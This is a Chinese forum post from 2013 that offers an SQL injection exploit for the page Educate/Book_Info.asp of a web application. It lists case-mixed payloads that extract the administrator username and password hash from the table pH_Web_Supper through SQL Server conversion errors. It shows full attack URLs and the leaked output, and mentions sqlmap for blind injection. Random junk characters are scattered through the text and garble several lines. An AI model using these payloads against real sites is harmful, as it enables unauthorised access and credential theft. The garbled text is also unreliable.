漏洞出现在Educate/Book_Info.asp 8 t3 j! t' x" s) B
" P0 @7 g; m( n
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出# H2 L% J N& U r
8 t0 N) l2 f" x6 i, U6 Q' E
exp:如下
5 z& j" U& y3 f$ w1 H' Q \, u查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)4 n8 z0 N) d' D6 U
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)- [2 [: l( ]8 B* j' Q
l$ q2 f2 f* Rhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)0 H, W: N1 v# d4 U1 n" F
1 y6 y" M1 o+ ~9 D/ uMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
- S8 _( y- C6 E* k, n% r7 e $ q' W8 P' M6 g
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
+ M% _. G' {! w
$ Q- v) D2 O2 ~ I% [/Educate/Book_Info.asp,行 8
4 ^, s$ F$ @: F' [) j) n u6 W
! `( J& l% n9 Dhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
& t) |- b$ P9 p3 E , ^! M* ~7 l/ h# O
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
9 ^$ o/ o2 I) c' {. K . D6 }9 I! \4 ?# ~3 Q! u% V
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。" I2 K0 H' i+ n( S
4 s$ h" c" f8 E1 K F2 T/Educate/Book_Info.asp,行 8
6 O. G9 L5 d1 @ |
发表于 2013-2-16 21:44:16
收藏
支持
反对